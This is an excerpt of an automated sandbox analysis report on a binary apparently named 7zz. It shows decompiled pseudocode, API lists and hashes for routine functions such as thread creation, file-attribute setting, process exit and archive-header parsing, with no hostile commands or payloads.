                                                                      0x0042d3d6
                                                                      0x0042d3d6
                                                                      0x0042d3e4
                                                                      0x0042d3f3
                                                                      0x0042d3f6
                                                                      0x0042d3f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042d3fe
                                                                      0x0042d401
                                                                      0x0042d404
                                                                      0x0042d406
                                                                      0x00000000
                                                                      0x0042d408
                                                                      0x0042d408
                                                                      0x0042d40c
                                                                      0x00000000
                                                                      0x0042d40e
                                                                      0x0042d411
                                                                      0x0042d413
                                                                      0x0042d416
                                                                      0x0042d419
                                                                      0x0042d41b
                                                                      0x0042d41e
                                                                      0x0042d477
                                                                      0x00000000
                                                                      0x0042d420
                                                                      0x0042d428
                                                                      0x0042d428
                                                                      0x0042d42b
                                                                      0x0042d42b
                                                                      0x0042d42b
                                                                      0x0042d42f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042d431
                                                                      0x0042d433
                                                                      0x0042d435
                                                                      0x0042d436
                                                                      0x00000000
                                                                      0x0042d436
                                                                      0x0042d43d
                                                                      0x0042d43d
                                                                      0x0042d45b
                                                                      0x0042d45b
                                                                      0x0042d45d
                                                                      0x0042d460
                                                                      0x0042d46a
                                                                      0x0042d46f
                                                                      0x00000000
                                                                      0x0042d43f
                                                                      0x0042d441
                                                                      0x0042d446
                                                                      0x0042d448
                                                                      0x0042d490
                                                                      0x0042d498
                                                                      0x0042d49b
                                                                      0x0042d4a0
                                                                      0x0042d4a3
                                                                      0x0042d4a4
                                                                      0x0042d4a6
                                                                      0x0042d4a6
                                                                      0x0042d4a9
                                                                      0x0042d4b0
                                                                      0x0042d4b5
                                                                      0x00000000
                                                                      0x0042d44a
                                                                      0x0042d44a
                                                                      0x0042d450
                                                                      0x0042d453
                                                                      0x0042d422
                                                                      0x0042d425
                                                                      0x0042d428
                                                                      0x00000000
                                                                      0x0042d455
                                                                      0x0042d455
                                                                      0x0042d458
                                                                      0x00000000
                                                                      0x0042d458
                                                                      0x0042d453
                                                                      0x0042d448
                                                                      0x00000000
                                                                      0x0042d43d
                                                                      0x0042d43b
                                                                      0x00000000
                                                                      0x0042d43b
                                                                      0x0042d428
                                                                      0x0042d41e
                                                                      0x0042d40c
                                                                      0x00000000
                                                                      0x0042d406
                                                                      0x0042d4b8
                                                                      0x0042d4b8
                                                                      0x0042d4b8
                                                                      0x0042d3d0
                                                                      0x0042d3cc
                                                                      0x0042d4ba
                                                                      0x0042d4bd
                                                                      0x0042d4c4
                                                                      0x0042d4ca
                                                                      0x00000000
                                                                      0x0042d4ca
                                                                      0x0042d372
                                                                      0x0042d372
                                                                      0x0042d372
                                                                      0x0042d370
                                                                      0x0042d4cc
                                                                      0x0042d4d2
                                                                      0x0042d4da

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: $c[@
                                                                      • API String ID: 3519838083-1303465990
                                                                      • Opcode ID: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                      • Instruction ID: dbd63947d3ec36f6418aa11a5244a4fc3f7eb44a15ca7d926c0188e08944aa22
                                                                      • Opcode Fuzzy Hash: 69068367b15dc9bd673a90d53c0485621dc67a4ad571aeb8f90f6fb8c481df08
                                                                      • Instruction Fuzzy Hash: 8851A3B1F002199BDB14DFA9D881ABFB7B5FF88304F50852AE405E7340D778A9418B65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046CD08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45threadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2770 46cd08-46cd1e call 46fe93 2773 46cd20-46cd51 call 46e370 CreateThread 2770->2773 2774 46cd5b-46cd64 call 46c0ff 2770->2774 2779 46cd53-46cd59 GetLastError 2773->2779 2780 46cd6f-46cd72 2773->2780 2781 46cd66-46cd6c call 4705d3 2774->2781 2782 46cd6d 2774->2782 2779->2774 2781->2782 2782->2780
                                                                      C-Code - Quality: 100%
                                                                      			E0046CD08(struct _SECURITY_ATTRIBUTES* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* _t18;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = L0046FE93(1, 0x74);
				if(_t26 == 0) {
					L3:
					E0046C0FF(_t26);
					if(_t25 != 0) {
						E004705D3(_t25);
					}
					return 0;
				}
				E0046E370(_t26);
				 *(_t26 + 4) =  *(_t26 + 4) | 0xffffffff;
				 *((intOrPtr*)(_t26 + 0x48)) = _a12;
				 *((intOrPtr*)(_t26 + 0x4c)) = _a16;
				_t9 =  &_a8; // 0x414677
				_t18 = CreateThread(_a4,  *_t9, E0046CD73, _t26, _a20, _a24); // executed
				if(_t18 == 0) {
					_t25 = GetLastError();
					goto L3;
				}
				return _t18;
			}






                                                                      0x0046cd11
                                                                      0x0046cd18
                                                                      0x0046cd1e
                                                                      0x0046cd5b
                                                                      0x0046cd5c
                                                                      0x0046cd64
                                                                      0x0046cd67
                                                                      0x0046cd6c
                                                                      0x00000000
                                                                      0x0046cd6d
                                                                      0x0046cd21
                                                                      0x0046cd2d
                                                                      0x0046cd31
                                                                      0x0046cd3a
                                                                      0x0046cd43
                                                                      0x0046cd49
                                                                      0x0046cd51
                                                                      0x0046cd59
                                                                      0x00000000
                                                                      0x0046cd59
                                                                      0x0046cd72

                                                                      APIs
                                                                        • Part of subcall function 0046FE93: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0046E3A8,00000001,00000074,?,?,00000000,00000001), ref: 0046FF89
                                                                      • CreateThread.KERNELBASE ref: 0046CD49
                                                                      • GetLastError.KERNEL32(?,00467AE9,00000000,00000000,004148ED,?,00000000,?,?,00414677,?,?), ref: 0046CD53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCreateErrorHeapLastThread
                                                                      • String ID: wFA
                                                                      • API String ID: 3580101977-151469634
                                                                      • Opcode ID: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
                                                                      • Instruction ID: 3bcaffb1de1f861aa2c0b81efa8886cf09e347fde19023c9913c4d3a853d5ec3
                                                                      • Opcode Fuzzy Hash: b7a88149dd98dfaf9bb2c186dc88153770bf2f3049edd001e68c2968dc4fa82c
                                                                      • Instruction Fuzzy Hash: 0DF0F4366006116BDB209F66EC41DAB3FA5DF81771B10443FFA5C82690EB3988518BAA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00409A29 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2785 409a29-409a44 call 46b890 2788 409a46-409a68 call 409ad5 call 4099a0 call 407a18 2785->2788 2789 409a6a-409a76 SetFileAttributesW 2785->2789 2794 409ac6-409ad4 2788->2794 2791 409a78-409a7a 2789->2791 2792 409a7c-409aa1 call 401e9a call 40b863 2789->2792 2791->2794 2802 409aa3-409ab9 SetFileAttributesW call 407a18 2792->2802 2803 409abb-409ac4 call 407a18 2792->2803 2802->2794 2803->2794
                                                                      C-Code - Quality: 100%
                                                                      			E00409A29(WCHAR* __ecx, long __edx) {
				int _t18;
				signed int _t23;
				int _t24;
				signed int _t28;
				void* _t54;

				E0046B890(E00473A24, _t54);
				_t48 = __edx;
				if( *0x490a7c != 0) {
					_t18 = SetFileAttributesW(__ecx, __edx); // executed
					if(_t18 == 0) {
						 *(_t54 - 0x18) = 0;
						 *((intOrPtr*)(_t54 - 0x14)) = 0;
						 *((intOrPtr*)(_t54 - 0x10)) = 0;
						E00401E9A(_t54 - 0x18, 3);
						 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
						if(E0040B863(_t54 - 0x18) == 0) {
							E00407A18( *(_t54 - 0x18));
							_t23 = 0;
						} else {
							_t24 = SetFileAttributesW( *(_t54 - 0x18), _t48);
							_t23 = E00407A18( *(_t54 - 0x18)) & 0xffffff00 | _t24 != 0x00000000;
						}
					} else {
						_t23 = 1;
					}
				} else {
					_t28 = E004099A0( *((intOrPtr*)(E00409AD5(_t54 - 0x24, __ecx))), __edx);
					E00407A18( *((intOrPtr*)(_t54 - 0x24)));
					_t23 = _t28;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t23;
			}








                                                                      0x00409a2e
                                                                      0x00409a40
                                                                      0x00409a44
                                                                      0x00409a72
                                                                      0x00409a76
                                                                      0x00409a83
                                                                      0x00409a86
                                                                      0x00409a89
                                                                      0x00409a8c
                                                                      0x00409a91
                                                                      0x00409aa1
                                                                      0x00409abe
                                                                      0x00409ac4
                                                                      0x00409aa3
                                                                      0x00409aa7
                                                                      0x00409ab6
                                                                      0x00409ab6
                                                                      0x00409a78
                                                                      0x00409a78
                                                                      0x00409a78
                                                                      0x00409a46
                                                                      0x00409a56
                                                                      0x00409a60
                                                                      0x00409a66
                                                                      0x00409a66
                                                                      0x00409acc
                                                                      0x00409ad4

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00409A2E
                                                                      • SetFileAttributesW.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00409A72
                                                                        • Part of subcall function 00409AD5: __EH_prolog.LIBCMT ref: 00409ADA
                                                                        • Part of subcall function 00409AD5: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00409AF6
                                                                        • Part of subcall function 004099A0: SetFileAttributesA.KERNEL32(?,?,00409A5B,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004099A2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesH_prolog$Apis
                                                                      • String ID:
                                                                      • API String ID: 1724483454-0
                                                                      • Opcode ID: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                      • Instruction ID: 62381452fa1776ecf317f5749025f9a102d19c157996ae2428c02df752bbe2da
                                                                      • Opcode Fuzzy Hash: 43186953be5daf0de57b10679b82a724e15aa266f1dac7b6fd580aaf3804a6e7
                                                                      • Instruction Fuzzy Hash: 9B116372F002459BCF04EF6698426AEBBB9DF85354F14443FE501B72D2DA3C4E059BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0046E717 Relevance: 4.6, APIs: 3, Instructions: 51COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2809 46e717-46e726 call 46e7bc 2812 46e728-46e733 GetCurrentProcess TerminateProcess 2809->2812 2813 46e739-46e74f 2809->2813 2812->2813 2814 46e751-46e758 2813->2814 2815 46e78d-46e7a1 call 46e7ce 2813->2815 2817 46e77c-46e78c call 46e7ce 2814->2817 2818 46e75a-46e766 2814->2818 2824 46e7a3-46e7a9 call 46e7c5 2815->2824 2825 46e7aa-46e7b4 ExitProcess 2815->2825 2817->2815 2821 46e77b 2818->2821 2822 46e768-46e76c 2818->2822 2821->2817 2826 46e770-46e779 2822->2826 2827 46e76e 2822->2827 2826->2821 2826->2822 2827->2826
                                                                      C-Code - Quality: 80%
                                                                      			E0046E717(void* __esi, int _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E0046E7BC();
				_t23 = 1;
				_t27 =  *0x49372c - _t23; // 0x1
				if(_t27 == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				_t16 = _a12;
				 *0x493728 = _t23;
				 *0x493724 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x496594; // 0x2290ab8
					if(_t9 != 0) {
						_t22 =  *0x496590; // 0x2290ae4
						_push(_t24);
						_t4 = _t22 - 4; // 0x2290ae0
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x496594; // 0x2290ab8
							} while (_t32 >= 0);
						}
					}
					E0046E7CE(0x48a0e0, 0x48a0e8);
				}
				E0046E7CE(0x48a0ec, 0x48a0f4);
				if(_t16 == 0) {
					 *0x49372c = _t23; // executed
					ExitProcess(_a4);
				}
				return E0046E7C5();
			}












                                                                      0x0046e717
                                                                      0x0046e718
                                                                      0x0046e71f
                                                                      0x0046e720
                                                                      0x0046e726
                                                                      0x0046e733
                                                                      0x0046e733
                                                                      0x0046e73f
                                                                      0x0046e743
                                                                      0x0046e749
                                                                      0x0046e74f
                                                                      0x0046e751
                                                                      0x0046e758
                                                                      0x0046e75a
                                                                      0x0046e760
                                                                      0x0046e761
                                                                      0x0046e761
                                                                      0x0046e766
                                                                      0x0046e768
                                                                      0x0046e768
                                                                      0x0046e76c
                                                                      0x0046e76e
                                                                      0x0046e76e
                                                                      0x0046e770
                                                                      0x0046e773
                                                                      0x0046e773
                                                                      0x0046e768
                                                                      0x0046e77b
                                                                      0x0046e786
                                                                      0x0046e78c
                                                                      0x0046e797
                                                                      0x0046e7a1
                                                                      0x0046e7ae
                                                                      0x0046e7b4
                                                                      0x0046e7b4
                                                                      0x0046e7a9

                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(0046D01D,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E72C
                                                                      • TerminateProcess.KERNEL32(00000000,?,0046E702,00000000,00000000,00000000,0046D01D,00000000), ref: 0046E733
                                                                      • ExitProcess.KERNEL32 ref: 0046E7B4
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
                                                                      • Instruction ID: f2142e9f323653ae12a02806cee2fc2220ca4adb72cbe7e174c19522fd5f48b0
                                                                      • Opcode Fuzzy Hash: d37c32f3b74641771bf8449d0f21babc3d9490daefb6715abc0a0bd2884901a9
                                                                      • Instruction Fuzzy Hash: D2010879100301AEEA10AF67FC8151E77E8EB65752B10843FF44456151EB699C908B1F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040E6D6 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2830 40e6d6-40e70a call 46b890 EnterCriticalSection call 40d340 2834 40e70c-40e71a call 40d071 2830->2834 2835 40e71d-40e735 LeaveCriticalSection 2830->2835 2834->2835
                                                                      C-Code - Quality: 100%
                                                                      			E0040E6D6(intOrPtr* __ecx) {
				intOrPtr* _t15;
				void* _t16;
				void* _t22;
				struct _CRITICAL_SECTION* _t23;
				void* _t25;
				intOrPtr* _t26;
				intOrPtr* _t29;
				void* _t30;

				E0046B890(E00474014, _t30);
				_t26 = __ecx;
				_t23 = __ecx + 4;
				 *(_t30 - 0x10) = _t23;
				EnterCriticalSection(_t23);
				_t15 =  *_t26;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t16 =  *((intOrPtr*)( *_t15 + 0x10))(_t15,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), 0, 0, _t22, _t25, __ecx);
				if(_t16 == 0) {
					_t29 =  *_t26;
					_t16 =  *((intOrPtr*)( *_t29 + 0xc))(_t29,  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)));
				}
				LeaveCriticalSection(_t23);
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}











                                                                      0x0040e6db
                                                                      0x0040e6e2
                                                                      0x0040e6e5
                                                                      0x0040e6e9
                                                                      0x0040e6ec
                                                                      0x0040e6f2
                                                                      0x0040e6f8
                                                                      0x0040e705
                                                                      0x0040e70a
                                                                      0x0040e70f
                                                                      0x0040e71a
                                                                      0x0040e71a
                                                                      0x0040e720
                                                                      0x0040e72d
                                                                      0x0040e735

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 0040E6DB
                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E6EC
                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0040E75C,?,?,?,?,?), ref: 0040E720
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterH_prologLeave
                                                                      • String ID:
                                                                      • API String ID: 367238759-0
                                                                      • Opcode ID: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                      • Instruction ID: e741d22780284c861742e84a626bb0d46a40b6509f00f1721e03e5846f5cf661
                                                                      • Opcode Fuzzy Hash: 049483b65675be0fe03f61d34f865e17871a24ff9367e82253095f38623ff512
                                                                      • Instruction Fuzzy Hash: EA011D76A00214AFCB119F94CC08B9EB7B9FF88711F10886AFD05E7250C774A950DF64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042EC5C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 88%
                                                                      			E0042EC5C(intOrPtr* __ecx, void* __eflags) {
				char* _t134;
				void* _t139;
				intOrPtr _t140;
				signed int _t143;
				intOrPtr* _t144;
				signed int _t146;
				void* _t148;
				void* _t152;
				signed int _t156;
				void* _t160;
				intOrPtr* _t171;
				intOrPtr* _t172;
				void* _t174;
				intOrPtr _t178;
				intOrPtr _t182;
				intOrPtr* _t183;
				signed int _t186;
				intOrPtr _t221;
				intOrPtr* _t222;
				void* _t224;
				void* _t228;
				signed int _t232;
				intOrPtr _t239;
				signed int _t240;
				intOrPtr _t243;
				signed int _t244;
				intOrPtr _t246;
				signed int _t248;
				intOrPtr* _t252;
				signed int _t254;
				void* _t255;

				E0046B890(E00477698, _t255);
				_t243 =  *((intOrPtr*)(_t255 + 8));
				_t252 = __ecx;
				E0042B5A9(_t243);
				 *((intOrPtr*)(_t243 + 0x138)) =  *((intOrPtr*)(_t252 + 0x20));
				 *((intOrPtr*)(_t243 + 0x13c)) =  *((intOrPtr*)(_t252 + 0x24));
				_t134 = _t243 + 0x130;
				 *_t134 =  *((intOrPtr*)(_t252 + 0x2e));
				_t193 =  *((intOrPtr*)(_t252 + 0x2f));
				 *((char*)(_t243 + 0x131)) =  *((intOrPtr*)(_t252 + 0x2f));
				if( *_t134 != 0) {
					E0042D0F8(_t193);
				}
				_t244 =  *(_t252 + 0x34);
				 *((intOrPtr*)(_t255 - 0x18)) =  *((intOrPtr*)(_t252 + 0x30));
				_t186 =  *(_t252 + 0x38);
				 *(_t255 - 0x14) =  *(_t252 + 0x3c);
				 *(_t255 - 0x10) =  *(_t252 + 0x40);
				 *((intOrPtr*)(_t255 - 0x48)) =  *((intOrPtr*)(_t252 + 0x44));
				_t228 = 0x14;
				_t139 = E0046B1C0(_t252 + 0x34, _t228);
				if( *((intOrPtr*)(_t255 - 0x18)) != 0 || (_t244 | _t186) != 0 || ( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0 ||  *((intOrPtr*)(_t255 - 0x48)) != 0) {
					__eflags = _t139 -  *((intOrPtr*)(_t255 - 0x18));
					if(_t139 !=  *((intOrPtr*)(_t255 - 0x18))) {
						E0042D0F8(0);
					}
					goto L24;
				} else {
					_t171 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t171 + 0x10))(_t171, 0, 0, 1, _t255 - 0x1c);
					if(_t143 != 0) {
						L55:
						 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
						return _t143;
					}
					_t172 =  *_t252;
					_t143 =  *((intOrPtr*)( *_t172 + 0x10))(_t172, 0, 0, 2, _t255 - 0x24);
					if(_t143 != 0) {
						goto L55;
					}
					_t221 =  *((intOrPtr*)(_t255 - 0x24));
					_t239 =  *((intOrPtr*)(_t255 - 0x20));
					_t248 = 0x1f4;
					_t174 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					asm("sbb edx, [ebp-0x18]");
					 *((intOrPtr*)(_t255 - 0x48)) = _t239;
					if(_t174 == 0 && _t174 < 0x1f4) {
						_t248 = _t221 -  *((intOrPtr*)(_t255 - 0x1c));
					}
					_t222 =  *_t252;
					asm("cdq");
					_t143 =  *((intOrPtr*)( *_t222 + 0x10))(_t222,  ~_t248, _t239, 2, _t255 - 0x24);
					_t271 = _t143;
					if(_t143 == 0) {
						_t240 = _t255 - 0x248;
						_t143 = E0040FAC0(_t271, _t248);
						if(_t143 != 0) {
							goto L55;
						}
						_t37 = _t248 - 2; // 0x1f2
						_t224 = _t37;
						if(_t224 < 0) {
							L31:
							_t143 = 1;
							goto L55;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t178 =  *((intOrPtr*)(_t255 + _t224 - 0x248));
							if(_t178 == 0x17 &&  *((char*)(_t255 + _t224 - 0x247)) == 6) {
								break;
							}
							if(_t178 != 1 ||  *((char*)(_t255 + _t224 - 0x247)) != 4) {
								_t224 = _t224 - 1;
								if(_t224 >= 0) {
									continue;
								}
							}
							break;
						}
						if(_t224 < 0) {
							goto L31;
						}
						asm("cdq");
						 *(_t255 - 0x14) = _t248 - _t224;
						 *(_t255 - 0x10) = _t240;
						asm("cdq");
						_t186 = _t240;
						asm("sbb ebx, [ebp-0x18]");
						_t244 = _t224 -  *((intOrPtr*)(_t255 - 0x1c)) +  *((intOrPtr*)(_t255 - 0x24));
						asm("adc ebx, [ebp-0x20]");
						_t182 = E0046B1C0(_t255 + _t224 - 0x248,  *(_t255 - 0x14));
						 *((intOrPtr*)(_t255 - 0x48)) = _t182;
						_t183 =  *_t252;
						_t143 =  *((intOrPtr*)( *_t183 + 0x10))(_t183,  *((intOrPtr*)(_t255 - 0x1c)),  *((intOrPtr*)(_t255 - 0x18)), 0, 0);
						if(_t143 == 0) {
							L24:
							_t140 =  *((intOrPtr*)(_t255 + 8));
							asm("adc edx, 0x0");
							 *((intOrPtr*)(_t140 + 0x140)) =  *((intOrPtr*)(_t252 + 0x20)) + 0x20;
							 *((intOrPtr*)(_t140 + 0x144)) =  *((intOrPtr*)(_t252 + 0x24));
							__eflags =  *(_t255 - 0x14) |  *(_t255 - 0x10);
							if(( *(_t255 - 0x14) |  *(_t255 - 0x10)) != 0) {
								__eflags =  *(_t255 - 0x10);
								if( *(_t255 - 0x10) > 0) {
									goto L31;
								}
								__eflags =  *(_t255 - 0x14) - 0xffffffff;
								if( *(_t255 - 0x14) > 0xffffffff) {
									goto L31;
								}
								__eflags = _t186;
								if(__eflags > 0) {
									L32:
									_t144 =  *_t252;
									_t143 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, _t244, _t186, 1, 0);
									__eflags = _t143;
									if(_t143 != 0) {
										goto L55;
									}
									 *((intOrPtr*)(_t255 - 0x2c)) = 0;
									 *((intOrPtr*)(_t255 - 0x28)) = 0;
									 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
									 *(_t255 - 4) = 0;
									E0040FA26(_t255 - 0x30,  *(_t255 - 0x14));
									_t146 = E0040FAC0(__eflags,  *(_t255 - 0x14)); // executed
									__eflags = _t146;
									if(_t146 == 0) {
										asm("adc edx, 0x0");
										 *((intOrPtr*)(_t252 + 0x48)) =  *((intOrPtr*)(_t252 + 0x48)) +  *(_t255 - 0x14) + 0x20;
										asm("adc [esi+0x4c], edx");
										_t232 =  *(_t255 - 0x14);
										_t246 =  *((intOrPtr*)(_t255 + 8));
										asm("adc eax, ebx");
										asm("adc eax, 0x0");
										 *((intOrPtr*)(_t246 + 0x1c8)) = _t232 + _t244 + 0x20;
										_t208 =  *((intOrPtr*)(_t255 - 0x28));
